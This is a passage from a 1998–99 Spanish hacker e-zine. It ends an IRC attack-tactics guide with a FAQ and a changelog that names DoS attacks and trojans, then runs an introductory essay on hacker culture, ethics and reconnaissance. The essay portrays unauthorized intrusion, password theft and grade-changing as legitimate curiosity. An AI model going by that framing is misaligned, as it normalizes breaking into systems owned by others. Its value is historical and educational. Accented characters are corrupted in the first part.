sobra. Cuantos mßs servicios ofrezca una mßquina mßs insegura y propensa a ser hackeada serß. Hay que procurar abrir ·nicamente los servicios que realmente nos hagan falta. 9.- A un amigo le entraron en su Windows y le empezaron a borrar carpetas. ┐C≤mo lo hicieron? R.- Tendrφa archivos o unidades compartidas sin password. Windows 95, por defecto, no pone password a los recursos compartidos, lo que es un grave problema de seguridad. Si usas recursos compartidos, íno olvides poner un password! Y si no los usas pues íno los tengas activados! Para esto ·ltimo basta con desactivar Netbios (una raz≤n mßs para tener cerrado el puerto 139). De lo contrario, cualquiera podrß entrar en tu HD: leer lo que quiera, borrar ficheros, modificarlos... íMuy peligroso! 10.- ┐Se puede mandar ataques como land o jolt, o spoofear desde Windows? R.- La pila TCP/IP que trae Windows tiene ciertas limitaciones que impiden, por ejemplo, el spoof. Sin embargo, hay un programa en fase de pruebas que puede spoofear y mandar muchos de estos ataques desde Windows. Lo hace implementando su propia pila TCP/IP y no usando las funciones de Winsock normales. Por ahora solo he visto una versi≤n beta que ·nicamente funciona en Win95. Existe tambiΘn una versi≤n comercial o al menos estaba en desarrollo. El programa se llama "Aggressor" y teneis su URL en la secci≤n de Resources. 11.- Me gustarφa saber mßs sobre los K/G-Lines: en quΘ consisten, lo que tienes que hacer para que no te hagan uno... R.- Simplemente es como un ban pero aplicado a hosts o dominios enteros. Es decir, si tu direcci≤n IP o el dominio al que pertenece tienen alguna de estas lines no podrßs conectarte a la red IRC, no te dejarß. La diferencia entre un K-Line y un G-Line es que Θsta ·ltima es global, o sea, que se aplica a todos los servidores de la red IRC y por tanto no habrß forma, en principio, de entrar a esa red IRC. Un K-Line se aplica a un servidor en particular de la red; es decir, que se nos deniega el acceso a la red IRC a travΘs de ese servidor, lo que no implica que no se pueda entrar por cualquier otro. TambiΘn es posible que una misma K-Line estΘ activa en distintos servidores a la vez (o incluso en todos, lo cual serφa equivalente a una G-Line). Estas lines se suelen poner como respuesta a abusos por parte de uno mismo o de alg·n otro usuario perteneciente a tu dominio y la duraci≤n de las mismas depende de la polφtica que sigan los administradores de la red de IRC. Para evitarlo, lo ·nico que hay que hacer es portarse bien o al menos ser suficiente bueno y que no te pillen mientras haces cosas malas };-) 12.- ┐QuΘ es una I-Line? R.- Es una entrada en el fichero de configuraci≤n del ircd que permite variar el n·mero de clones admisibles desde una determinada direcci≤n IP o dominio. La a±ade un administrador del servidor IRC para por ejemplo permitir la entrada al IRC desde cybercafΘs (donde normalmente todos los ordenadores se ven como una misma direcci≤n IP) o mßquinas multiusuario (universidades, Θtc). 13.- ┐QuΘ es un script Perl? R- Perl es un lenguaje de programaci≤n interpretado. Un script (a secas) es algo que automatiza tareas, una especie de programa (asφ tenemos scripts de IRC, de shell [Unix], Θtc) Un script Perl es un script de Unix que en vez de usar una shell para su ejecuci≤n usa el propio programa de Perl. En definitiva, se trata de un programa escrito para Perl. 14.- Do you have an English translation of this page? A.- Not at this moment, I hope it will be available soon though. I'm looking for somebody to translate this doc since I'm very busy for doing it by myself. 15.- Tengo informaci≤n sobre ataques / bugs / fixes que no se listan en este documento. ┐Puedo ayudar? R.- Por supuesto. Este documento jamßs estarß 100% completo porque ni soy perfecto ni tengo todo el tiempo del mundo. Pero intentarΘ actualizarlo con la mayor frecuencia posible. Toda la ayuda y support que pueda recibir de parte vuestra serßn bien acogidos. Puedes enviar tus comentarios a roman@deathsdoor.com 16.- Me gustarφa saber mßs acerca del "DNS inject". ┐Alguna idea? R.- Sφ, claro. Mira la URL dada en la secci≤n "Resources" para una completa informaci≤n acerca de su funcionamiento y posible puesta en marcha (desde un punto de vista prßctico). De todas formas, creo oportuno decir que es una tΘcnica bastante costosa de implementar y bastante desagradecida, ya que la mayorφa de servidores de nombres (DNS) estßn ya parcheados (en particular, los relacionados con redes importantes de IRC). 9.- Agradecimientos. Quisiera dar las gracias a jcea@argo.es por echarle un vistazo a la primera versi≤n de este texto y por sus comentarios desinteresados sobre Θl. Asφ mismo, a todos los que me habeis apoyado con vuestros comentarios u opiniones acerca de este escrito. íNo dejeis de seguir haciΘndolo! TambiΘn me gustarφa saludar desde aquφ a todos mis amigos y conocidos del IRC, en especial a los canales #insultos, #hack, #hackers, #hack_novatos, #amiga y #llfb de la red irc-hispano. 10.- Modificaciones. * Cambios en este documento en la versi≤n 1.0: - A±adida esta secci≤n. :-) - Mejor explicado lo del "spanning tree" (estructura de una red IRC). - A±adido el concepto de "hop". - A±adidas un par de URL's en la secci≤n de "resources". - A±adida secci≤n "tΘcnicas avanzadas" incluyendo "bouncing" y "DNS Inject". - A±adidos diversos fuentes en C: ICMP nuke, OOB, ssping, bouncer, ... - A±adidas direcciones donde encontrar numerosos parches. - A±adidas URL's de referencia en la secci≤n de "spoof". - A±adidos nuevos ataques: teardrop, land, teardrop modificado y smurf. * Cambios en este documento en la versi≤n 2.0: - Variaci≤n de las condiciones de distribuci≤n de este documento. - Sustituido c≤digo fuente de los diferentes programas por enlaces a los mismos (se han puesto en ficheros independientes). - A±adidos los ataques: bonk, syndrop, overdrop, nestea y hanson. - A±adido c≤mo "robar" un bouncer asφ como nuevo c≤digo de bouncer con soporte de password. - A±adida secci≤n "feedback (FAQ)", con las respuestas a las preguntas mßs frecuentes formuladas al autor acerca de este documento. - A±adida secci≤n "defensa", con algunos consejos generales para defendernos de distintos ataques. - A±adido apartado "Wingate". - A±adido concepto de "i-line" en la secci≤n introductoria. - A±adida secci≤n "trojans". - A±adido apartado "recursos compartidos". - Revisadas las distintas secciones y ampliadas algunas con mßs info o alg·n link. * Cambios en este documento en la versi≤n 2.1: - A±adido apartado "Ping of death". - A±adida secci≤n "Modem DoS", con los apartados "/Msg ComX" y "+++ATH0". - A±adido source "script.ini". - A±adido apartado "Back Orifice" en la secci≤n de troyanos. - A±adido apartado "NetBus" en la secci≤n de troyanos. - A±adido RFC1459. - A±adidos peque±os cambios en la "FAQ" y en "Resources". 11.- Notas finales. Espero que este artφculo os haya servido al menos para comprender un poco mßs el funcionamiento del IRC. TambiΘn me gustarφa recordar que el IRC no es un campo de batalla, y que no se debe atacar a la gente asφ porque asφ, salvo "en defensa propia" y pocos casos mßs justificados. O:-) En cualquier caso un ataque nunca estß justificado desde el punto de vista de los ircops, asφ que cuidado con las K/G-lines ;-) Se agradecerφa toda clase de comentarios y sugerencias para mejorar el documento: bug reports, asuntos que creßis no estßn bien explicados, temas que faltan y se deberφan incluir, ..., y en definitiva todo lo que os gustarφa que se incluyese en el documento. TambiΘn se aceptan O-lines ;-). Se rechazarß estrictamente todo aquello que salga de la temßtica asφ como dudas personales. Si lo creo conveniente y las dudas son generalizadas las intentarΘ aclarar en posteriores revisiones de este documento (ver secci≤n "Feedback") pero (y repito) no a nadie en particular. Teneis que comprender que no tengo todo el tiempo del mundo. Podeis contactar con el autor de este escrito por email: roman@deathsdoor.com . O localizarme en el IRC hispano bajo el nick de RoMaNSoFt. Podeis consultar la web de la red Hispana de IRC para averiguar servidores por donde entrar (ver secci≤n "Resources"). c'U l8er!!!!! _______________________________________________________________________________________________ (c) RoMaN SoFt / LLFB, 1998 La distribuci≤n de este documento es "libre", con la ·nica condici≤n de informar al autor en caso de subirlo a alg·n ftp site o pßgina web, y siempre que no sea con fines comerciales ni reporte beneficio econ≤mico alguno. Las mismas restricciones se aplican a cualquier otra forma de difusi≤n p·blica (revistas, news, Θtc). En el caso de publicaciones (revistas) Θsta deberß ser completamente gratis. El documento debe ser distribuido de forma φntegra, no estß permitida la modificaci≤n total o parcial ni la difusi≤n de partes aisladas del mismo. En caso de incumplimiento se emprenderß las acciones legales pertinentes. Contactar con el autor para cualquier otra modalidad o forma de difusi≤n. ############################################################################################### (c) RoMaN SoFt / LLFB, 1998.- (·ltima modificaci≤n de este fichero: 04/01/99) ############################################################## NOTA IMPORTANTE: # yo (ZeD) recomiendo que visites la web del autor # ya que este texto a sido pasado a TXT de un HTML # por lo tanto en el html ( y en la web) podras encontrar # muchos scripts y programas que aqui se describen. # Recuerda que la dire de este texto es: # http://www.esi.us.es/~roman/tacticas.html # ############################################################## ((((((((((((((ZeD-wOrLd-EzInE numero 5))))))))))))))))))))))))))))))))))))))))))))))))))))))))) stain@iname.com S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. Presenta... S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. UNA INTRODUCCION BASICA AL HACKING Y AL UNDERGROUND S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. S.T.A.I.N. stain@iname.com ║ 0.0 ║ INDICE 1.0 Introduccion - Historia de "Una Introduccion basica al Hacking..."... 2.0 Definicion........................................................... 2.1 Manifiesto HBO....................................................... 3.0 Origenes............................................................. 4.0 La apariencia de un hacker........................................... 5.0 La etica del hacker.................................................. 6.0 Clasificacion........................................................ 6.1 Wannabes y Lamers.................................................... 6.2 Pseudo-hackers ...................................................... 6.3 Hackers (propiamente dicho).......................................... 7.0 Concejos utiles...................................................... 8.0 El Underground (Informatico)......................................... 8.1 ¿Que es todo eso de Phreaking, Carding... ?........................... 9.0 Internet for dummies (muuuuuuuy elemental)........................... 9.1 Que es Internet?..................................................... 9.2 Un poco de historia.................................................. 9.3 TCP/IP: Un protocolo de comunicaciones............................... 9.4 Formas de conectarse................................................. 9.5 Quienes compones Internet?........................................... 9.6 Quienes administran Internet?........................................ 9.7 Que se necesita para estar adentro?.................................. 9.8 Que servicios brinda Internet?....................................... 9.9 Productos de Internet................................................ 10.0 Cyberpunks........................................................... 10.1 El movimiento literario.............................................. 10.2 La subcultura........................................................ 10.3 La moda de hoy....................................................... 11.0 Agradecimientos...................................................... 12.0 Citas................................................................ ║ 1.0 ║ INTRODUCCION - HISTORIA DEL DOCUMENTO "UNA INTRODUCCION BASICA AL HACKING..." =-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Todo empezo con un file de Hugo Cornwall viejisimo que hablaba de los hackers y que me parecio muy interesante; entonces le traduje unas cosas y le fui agregando otras a medida que pasaba el tiempo. De esta manera nacio este documento. El nombre original de este documento era "Hacking y Hackers verdaderos", el cual estaba disponible en algunos BBSs de Buenos Aires, Argentina. Este documento fue un proyecto dejado que le pude haber agregado millones de cosas mas, pero como una introduccion TOTALMENTE basica al hacking y al underground, lo que es el hacking, quienes lo componen y otras yerbas, cumple su proposito. Para los que conozcan la saga "Hacking y Hackers verdaderos", esta seria la version 4.0 del file (muchisimo mas recortado); destinada al publico abierto de internet. Lo que es este documento: con este documento pretendo dar una introduccion MUY BASICA al hacking y al underground en general a aquellas personas que recien ingresan, para que conozcan que son los hackers, que hacen, su ideologia; que son los phreakers, y otras yerbas. Lo que no es este documento: una guia paso a paso de como hackear; si ya estas en el ambiente tambien este documento sera interesante para ti. Antes que nada.... todo lo expresado aqui es opinion mia y no significa que este 100% correcto; soy humano como vos y me puedo equivocar. Puedes llegar a encontrar definiciones, conceptos e ideas que quiza no correspondan con las tuyas; si hay algun error grave, y solo si, hazmelo saber a stain@iname.com. Recuerda: nadie es perfecto, ni siquiera tu. ║ 2.0 ║ DEFINICION ==-=-=-=-= La palabra hacker deriva de "hack", que significa "un corte repentino", o "hachar". Este termino, del sajon coloquial, es tambien utilizado para describir la accion mediante la cual los tecnicos del service golpeaban bruscamente los telefonos publicos u otros aparatos con la pretension de arreglarlos (ya que antiguamente tenian valvulas y no transistores). Al que llevava a cabo este metodo de reparacion se lo llamaba "hacker". El hacking se manifiesta en sus comienzos (1968, si mal lo recuerdo) como una contracultura que se desarrolla en forma paralela al crecimiento de un nuevo establishment tecnocratico: la contracultura de las corporaciones. Modernamente el Hacking se considera como una actividad recreativa, educativa y semi-legal, impulzada principalmente por la curiosidad natural del hombre (el deseo de conocer mas), que consiste en tratar de penetrar sin autorizacion a computadoras o sistemas para ver que hay dentro y de llegar hasta donde nadie habia llegado antes. El tema de a donde apunta esta actividad y las actividades que lo rodean siempre fue desentendido, por lo que voy a tratar de poner los puntos sobre las ies. Lo que proponen los hackers es la liberacion del monopolio de la informacion en manos del Gobierno en pos de una democratizacion de la tecnologia. Ellos tienen bien en claro que el Gobierno trabaja con informacion vital de todos los ciudadanos y se reservan datos que prefieren mantener confidenciales que supuestamente deberian estar al alcance de todos. En pocas palabras quieren que la informacion sea libre, gratuita e igual para todos (sin importar raza, sexo, religion, nacionalidad, color, o nada), ya que en la era digital quienes dominen las computadoras dominaran la conciencia, la informacion y el pensamiento de las personas. A algunos hackers (REALES, no pseudohackers), generalmente los que son mas veteranos, les interesaria hacer fraudes masivos, modificar su cuenta bancaria, caja de ahorro, ficha de empleo, usar numeros de tarjetas de credito robados en Internet, etc.. pero piensan que es muy dificil y generalmente son atrapados por la policia, el Servicio Secreto o el FBI. Por lo que se limitan a hacer cosas mas simples o que no traigan consecuencias tan severas. A la mayoria de los hackers les gusta hacer cosas no tan complicadas y con las que uno no pueda ir a la carcel tan facilmente, como cambiar sus notas en el Colegio/Universidad; conseguir passwords y usar cuentas ajenas en BBSs o Internet; hackear un BBS, obtener atributos de sysop o de super usuario, bajarse todas las cosas interesantes pero NO CRASHEARLO (hacerlo mierda) porque esa seria la cosa mas estupida que un hacker que quiera ser bueno (hablando de calidad) podria hacer: si uno destruye un BBS o un sistema al que accedio, ademas de ser un estupido, esta perdiendo una oportunidad como pocas de ampliar sus conocimientos, probar todas las cosas posibles y siempre tratar de llegar mas alla. Si el hacker investigo y aprendio todo lo posible, lo ideal seria que publicara su descubrimiento o experiencia en una revista electronica, BBS, Internet o lo que sea para que otras personas que no saben tanto aprendan (por mas que sigan sus mismos pasos). La mayoria de los hackers que conoci coincide en que la diversion esta en DESARROLLAR y ENTENDER un sistema (DOS/Windows 95/NT, Unix, Macintosh, VMX, etc) PRODUCIENDO finalmente las HABILIDADES (lleva tiempo y es donde la mayoria se rinde) y HERRAMIENTAS (hacer programas para automatizar el trabajo tedioso. El mejor ejemplo es el SATAN "Sistem Administrator Tool for Analizing Networks" o SANTA que es lo mismo que el anterior pero mas nuevo: "Sistem Administrator Network Tool Analizer") para VENCER la seguridad de ese sistema (persevera y triunfaras y PENETRAR en el para aprender de sus debilidades y hacer ahi dentro lo que se le de la gana. En resumen: APRENDER + ADAPTAR = SUPERAR y luego DISFRUTAR. Generalmente lo mejor de entrar a un sistema es que uno nunca sabe lo que va a encontrar... todos los sistemas son una caja de Pandora que esta esperando ser abierta para nuestra satisfaccion. El dicho dice: "La curiosidad mato al gato... PERO LA SATISFACCION LO REVIVIO" 2.2 MANIFIESTO HBO El siguiente es un manifiesto del Grupo HBO (Hacked By Owls) de Argentina que lo hicieron conocer en el Primer Congreso de Virus, Hacking y Computer Underground organizado por Fernando Bonsenbiante (ex Virus Report); realizado en el Centro Cultural Recoleta en el año 1992 o 93 en Buenos Aires, Argentina. 01234567890123456789 The quick brown fox jumps over the lazy DOG. [El veloz zorro marron salta sobre el perro perezoso] Esta conferencia sucks [apesta], como todas las conferencias de "hackers", y eso no tiene nada que ver con las buenas intenciones de F. Bostandante [asi lo llaman los hackers], es simplemente que hablar a cerca de los hackers es pointless [no tiene sentido]. Los hackers no somos ni queremos ser Rock Stars, y toda esta publicidad barata se la pueden meter en culo, no la necesitamos ni nos hace bien. Es logico que los que no saben quieran saber que es un "hacker", bueno vamos a intentar dar una pequeña definicion. def: TODA PERSONA CURIOSA ES UN HACKER POTENCIAL. La tecnologia nos la venden con etiquetas que nos dicen para que usarla, todo eso es mentira; la tecnologia es solo una herramienta, hay que saber darla vuelta, y usarla del otro lado. Todos escuchamos que la informacion debe ser libre, esto solo significa que todos tenemos que poder elejir el pasto del que comemos. La investigacion en ciencias es una de las actividades intelectuales mas gratificantes, y todos los investigadores son en cierta medida hackers. Si el gobierno anuncia ahora que que privatiza la CNEA [Comision Nacional de Energia Atomica (Argentina)], porque lo mando el banco mundial, y si Cavallo [Ex ministro de Economia de Argentina] manda al Conicet a lavar los platos, y todo eso es tan LEGAL, no preguntamos quien es quien para juzgar la legalidad de un grupo de personas que lo unico que buscan es el conocimiento. Desafiar las leyes en las que uno no cree es la unica manera de seguir creyendo en uno mismo y no convertirse en un pedazo de sillon para que venga alguien y se siente arriba. Manifiesto HBO Hacked by Owls ║ 3.0 ║ ORIGENES =-=-=-=- La palabra "hack" tuvo su origen mucho antes de que las telecomunicaciones estuviesen al alcance de todos y de que un adolescente pudiera entrar con su modem desde su casa a un sistema protegido por una dudosa seguridad. La palabra "Hacker" nacio alrededor de 1959 en el Massachusets Institute of Technologies (MIT). Ser un hacker en esa epoca era pertenecer a la aristocracia que conocia realmente a las computadoras, por oposicion a los "meros usuarios" que sabian solos lo estrictamente necesario para hacer su trabajo. Los hackers de esa epoca pasaban noches enteras en el MIT o en universidades programando. Esto era porque todavia no existian las computadoras personales, porque una computadora podia valer millones de dolares y una persona normalmente no tenia acceso a una excepto que trabajara para una empresa muy importante o que estudiara en una universidad que tuviera una. El hecho de que generalmente un hacker trabajara de noche se debia a que las maquinas se usaban furante el dia en tareas mas "serias" que los proyectos de los hackers. Un hacker en esa epoca programaba aplicaciones raras como lenguajes de programacion nuevos, juegos, editores de texto, sistemas operativos u otras aplicaciones que nadie les habia encargado pero que ellos querian hacerlas lo mismo. Estas aplicaciones podrian terminar como un exito economico para las empresas que los empleaban o para los mismos hackers. Por ejemplo, el sistema operativo UNIX empezo como un trabajo a escondidas de un hacker y termino siendo un exito comercial impresionante. [Cutpasteado de una Virus Report] ║ 4.0 ║ LA APARIENCIA DEL HACKER -=-=-=-=-=-=-=-=-=-=-=-= De todas las formas que el hacking es encuadrado en las peliculas, libros, revistas y TV, la que mas confunde a la gente (y la que mas molesta a los hackers) es la concentracion del hacker en la imagen de un nerd solitario, con anteojos y lleno de acne juvenil adicto al cafe negro y al cigarrillo, sentado frente a su monitor y teclado por horas intentando dar con la clave, tratando de encontrar un bug, una backdoor o algo similar que le permita acceder a un sistema. Pero hoy en dia las cosas cambiaron bastante... esa imagen desaparecio... ahora los hackers no son para nada nerds; al contrario, generalmente la unica materia que tienen aprobada con mas de 7 es computacion o alguna similar. Se juntan en grupos y se identifican con nombres como "Digital Anarchy" [DAN], "Hacked by owls" HBO, etc. en Argentina o Legion of Doom, Legion of Lucifer, Masters of Deception, NuKe, etc. en EEUU. Los hackers de hoy ya no se visten con ropa formal como lo muestran las peliculas o describen algunos libros, sino que lo hacen como se les da la gana, sin modas... son ellos mismos. Los que generalmente estan metidos en el Under escuchan grupos de musica alternativos o Hard Core al estilo Punk, Skank, Heavy, Trash y Grunge; aunque conoci un monton que escucha Trance, Tecno o con musica clasica. Por suerte una de las ultimas peliculas que se hizo es "Hackers" y la representacion de estos es un poco mas realista y modernizada; aunque la pelicula da asco. La apariencia de los hackers cambio, los hackers evolucionan y lo seguiran haciendo a medida que la tecnologia siga avanzando. ║ 5.0 ║ LA ETICA DEL HACKER -=-=-=-=-=-=-=-=-=- Steven Levy resumio la etica del hackers en su libro "Hackers: Heroes of the computer revolution" asi: * El acceso a las computadoras -y a cualquier cosa que pueda enseñarte algo acerca de la forma en que funciona el mundo- debe ser total e ilimitado. * Apelar siempre a la imperativa: -Manos a la obra! * Toda informacion debe ser libre y/o gratuita. * Hay que desconfiar de la autoridad. Hay que promover la descentralizacion. * Los hackers deberan ser juzgados por sus hackeos, no por falsos criterios como titulos, edad, raza, o posicion. * En una computadora se puede crear arte y belleza. * Las computadoras pueden cambiar la vida para mejor. El 4 de Agosto de 1989 en Amsterdam, Holanda, cuando se celebro la primera reunion internacional de hackers, la Galactic Hacker Party, un tal Felstein presento una declaracion aprobada por unanimidad de los asistentes a la fiesta. Esta decia: Considerando que: La sociedad democratica esta basada en el derecho de todos a acceder a la informacion publica y el derecho de asociarse libremente, y que en años recientes, se han desarrollado estructuras tecnicas para manipular esa informacion, las cuales obscurecen la accesibilidad a esa informacion a traves de la complejidad, y que esas estructuras tecnicas tambien sirven para aislar a la gente y para anular su derecho de asociacion, AFIRMAMOS Y DECLARAMOS: * El derecho a descubrir no solamente toda la informacion publica, sino tambien el funcionamiento de los mecanismos por los cuales esta informacion es recolectada y procesada; * La responsabilidad de evitar dañar a otros mientras ejercitamos este derecho de descubrimiento, y * El derecho y responsabilidad de compartir el conocimiento y las habilidades que sirven para revelar la funcion de los mecanismos de procesamiento de informacion, mientras guardamos estrictamente la confidencialidad de la informacion que ha sido confiada o entregada a dichos mecanismos por partes privadas. Decimos NO a la sociedad de la informacion, SI a una sociedad informada. [Cut-pasteado del "Hackers, la guerrilla informatica"] ║ 6.0 ║ CLASIFICACION DE LOS HACKERS -=-=-=-=-=-=-=-=-=-=-=-=-=-= Es hora de aclarar que existen dos principales clases de "hackers": (1) los PSEUDOHACKERS (de lo que esta lleno) (2) los HACKERS (propiamente dicho) o Veteranos / ELITE (a lo que casi todos apuntamos a ser) Despues estan los WANNABES y los LAMERS (que es lo peor que se puede ser). 6.1 NEWBIES, WANNABES Y LAMERS Newbie significa novato, el que recien comienza. Este documento esta apuntado a los newbies o a las personas que simplemente tienen ganas de leerlo. TODOS hemos pasado por la etapa de newbie... es irremediable. Esta en nosotros superar esa etapa sin entrar en el wannabe-ismo ni en el lamer-ismo. Mo hay problema de ser newbie (no hay nada malo), lo malo es ser wannabe o lamer. Wannabe significa "want to be", querer ser. En este caso un hacker. Lamer, que no existe en el ingles comun sino en el ingles usado en el underground, es un wannabe muy estupido y terriblemente molesto. Estos dos tipos de "seres" no entienden que en la vida no se puede tener todo servido y que tienen que investigar y esforzarse para lograr lo que quieren. Lo unico que quieren son resultados, por lo que no se interesan por el funcionamiento de nada... ni de las centrales telefonicas ni del funcionamiento de los sistemas ni de nada. Lo unico que quieren saber es como se hace para robar plata de un banco, cambiar sus notas en la Universidad, hablar gratis por telefono (que en realidad es Phreaking), como destruirle el disco duro a un enemigo o a la computadora de su Universidad (que eso es de los crashers, pero para ellos son todos lo mismo) y un monton de tonterias. Obviamente no se los consideran hackers ya que el ser hacker esta solo en sus sueños. La mayoria de los wannabes y lamers miran a los hackers como idolos o dioses, y harian cualquier cosa por ser como ellos y actuar como ellos. Es por eso que leen todo lo que encuentran sobre el tema y hacen millones de preguntas estupidas (las peores preguntas son las de los lamers) sin ni siquiera tener los conocimientos basicos de como manejar una computadora, sistemas operativos o lenguajes de programacion. Lo peor y lo que mas molesta de esta "gente" es que no toman al hacking por lo que es, sino por lo que se puede hacer con el; se piensan que es cualquier cosa y, al no tener paciencia y estar apurados por ver resultados satisfactorios, (si es que alguna vez intentan hacer algo) se cansan, dicen que es muy dificil y se rinden. Recuerden: ejecutar un exploit no es ser hacker! Saben que hace el exploit? Saben por que funciona? Usar el PHF no es ser hacker! Saben lo que es PHF? Saben por que funcionaba y ahora casi no? Si pueden responder las preguntas estarian en posibilidades de entrar a la siguiente etapa: 6.2 "PSEUDO-HACKERS O HACKERS TRUCHOS" Cualquiera puede transformarse en un pseudo-hacker: alguien te da una IP y el password de un sistema, escribes la IP, esperas el login, ingresas el password y... entraste!; das vueltas por unos minutos, buscas algo interesante, copias lo que se te da la gana y finalmente te desconectas. O si eres estupido: pones un troyano, un virus o crasheas el sistema y evitas que alguien mas tenga la oportunidad de aprender algo o de acceder a la misma info que vos. Seguramente te divertiste por unas horas y sacaste unos archivos espectaculares; pero... piensa bien, no hiciste nada mas que seguir un camino bien marcado por alguien y seguramente por un monton de personas mas e hiciste caso a algunas advertencias que te habian dado. A estos les llamo pseudos porque copiaron algo que otro hizo y descubrieron algo ya conocido. PERO estas experiencias "truchas" van entrenando al futuro hacker y le van dando experiencia en las distintas formas de acceder a un sistema, para que finalmente lo haga por si solo y se convierta en un Hacker real. El pseudohacking es una etapa en la vida del hacker que es inevitable puesto que nadie nace sabiendo. El problema es no vivir siempre en esta etapa y descubrir las cosas nosotros mismos. En esta etapa se supone que el pseudohacker sabe lo que hace y como funcionan las cosas (los scripts; *nix, Win NT, etc). 6.3 HACKERS (PROMIAMENTE DICHO) Finalmente llegamos a donde todos quieren llegar. Los verdaderos hackers. Estos, en contraste con los pseudohackers, hacen sus propios descubrimientos, investigan, aprenden, mejoran sus tecnicas o aprenden nuevas tecnicas (ya que van apareciendo nuevos sistemas), programas, protocolos, etc.. Los hackers verdaderos son los que descubren bugs y otras tecnicas de ataques a sistemas. Estos hackers a veces conocen a otros que son considerados "ELITE", son los pioneros, los que mas saben... son los doctores de la era digital. Algunos se juntan en grupos y comparten sus conocimientos, como por ejemplo "The CHAOS Computer Club" o CCC que entraron a la NASA (este grupo ya es bastante viejo) y otros prefieren estar solos como por ejemplo Emmanuel Goldstein de la revista 2600 que la viene publicando desde mil novecientos setenta y algo. El es considerado mundialmente como un pionero del hacking. Un claro ejemplo de este tipo de hackers es el famoso Kevin Mitnik. ║ 7.0 ║ ALGUNOS CONCEJOS =-=-==-=-=-=-=-= El exito del hacking depende de que tu investigacion. Los materiales para investigar estan en todas partes: tambien como el material orientado directamente al hacking del tipo que encontras en cualquier BBS, en Internet, en reuniones dedicadas al tema, chats, escuchado en algunas esquinas durante el recreo de un Congreso, etc. Enormes cantidades de literatura fundamental se publica todos los dias por los departamentos de marketing de las compañias de computadoras y repartidas a todos los comerciantes: fajos de papeleria y camiones cargados de documentacion interna que tienen importantes pistas o pedazos de informacion que estan sueltos esperando a ser recogidos. Depende de cada uno de ustedes reconocer estos "tesoros" por lo que son, y compilarlos de una forma que pueda ser utilizada. Cualquiera que haya hecho trabajos de inteligencia, no necesariamente para el gobierno, pero para una compañia, va a decir que facilmente el 85% de la informacion que uno quiere esta gratuitamente disponible y que la parte dificil es reconocerla y analizarla. El problema generalmente es que se consiguen los programas pirateados que vienen sin manual; o si se los compran, los manuales se ven demasiado gordos como para leerlos... ahi esta el error que casi todos cometen. NUNCA subestimes a los manuales. Del 15% restante, casi la mitad puede ser deducida del material que uno ya tiene, porque dado un objetivo deseado, usualmente hay solo un limitado numero de soluciones sensibles. Podemos llegar mas alla: a veces podes probar tus DEDUCCIONES y despues desarrollar futuras hipotesis. Entonces el hacker verdadero, lejos de estar perdiendo el tiempo frente a una PC `probando cosas' en el teclado, a menudo puede ser encontrado recorriendo exhibiciones, yendo a demostraciones, recogiendo literatura y, aunque no lo creas, revolviendo la basura que es un excelente lugar para buscar la informacion que necesitas. Recuerda que la investigacion de un hacker no depende simplemente en coleccionar papeles para quiza usarlos en el futuro. Si decidis apuntar a un tipo de red en particular, es casi increible lo que podes encontrar con poco esfuerzo. A continuacion te doy unos tips para que saques tus propias conclusiones y hagas tus hipotesis: La organizacion dueña del sistema, "publica alguna informacion sobre el?"... "en un libro, manual, revista o reporte?". "Cuando fueron el software y el hardware instalados?". "Alguna de las revistas de computacion escribio algo al respecto?". Que es lo que conoces del hardware, que tipos de sistemas operativos esperas encontrar, quien aporto el software, conoces a alguien con experiencia en sistemas similares; etc. El hacking va a depender de TI, de tu INTELIGENCIA, de tu PACIENCIA, de tu DEDUCTIBILIDAD y en gran parte de tu SUERTE (bueno, en gran parte). ║ 8.0 ║ EL UNDERGROUND (INFORMATICO) =-==-=-=-=-=-=-=-=-===-=-=-= Hablando con diferentes personas, y viendo como se presenta al publico, llegue a la conclusion de que la gente no sabe muy bien lo que es el Undergound (Informatico), creen que solo es hacking o dicen cualquier cosa. Estan todos equivocados. Informacion Underground significa en castellano basico "lo que no se deberia saber" (ya que puede causar conmocion popular o porque el mal uso de esa informacion puede llegar a causar problemas :) ). La traduccion de Underground es "debajo de la tierra". Y toda la la informacion que se encuentra en este ambiente es es cubierta por el Gobierno, el Estado mismo y el SIDE (Servicio de Inteligencia del Estado en Argentina), la NASA, el FBI (Federal Bureau of Investigation), la CIA, la KGB, la DEA (Drug Enforcement Agency), el Servicio Secreto de EEUU, los medios masivos de comunicacion, la Policia, los Bancos, los supuestos expertos en seguridad informatica, y todo aquel que esta en contra el libre flujo de "todo tipo" de informacion. En consecuencia, el Hacking, Phreaking, Carding, Cracking, Crashing, el Warez, la Anarquia, el Lockpicking, el Virucking o Viriing, el como fabricar cientos de drogas o como conseguirlas, la Magia Negra, el ocultismo, la informacion robada que compromete a cientos de personas y agencias (como el caso de el grupo CHAOS que robo unos datos confidenciales del desastre de Chernobyl y los publico), informacion sobre los Ovnis o lugares secretos (Area 51?), todas las formas posibles de abusarse de la tecnologia o usarla "indebidamente" y todo aquello que no se deberia saber, o que no se tiene que saber, entran en el concepto de Informacion Underground por razones obvias. Lo de "Informatico" es porque se transmite a traves de medios electronicos, por ejemplo BBSs, Internet, etc. 8.1 "Y QUE ES TODO ESO DE PHREAKING, CARDING.... ?" Las otras cosas que casi todos confunden es la diferencia entre las actividades que integran el Underground. En los comienzos del hacking, la palabra "hackear" se usaba como forma universal de abusarse de todo tipo de cosas referidas (o no) a la tecnologia. Entonces se podia hackear los 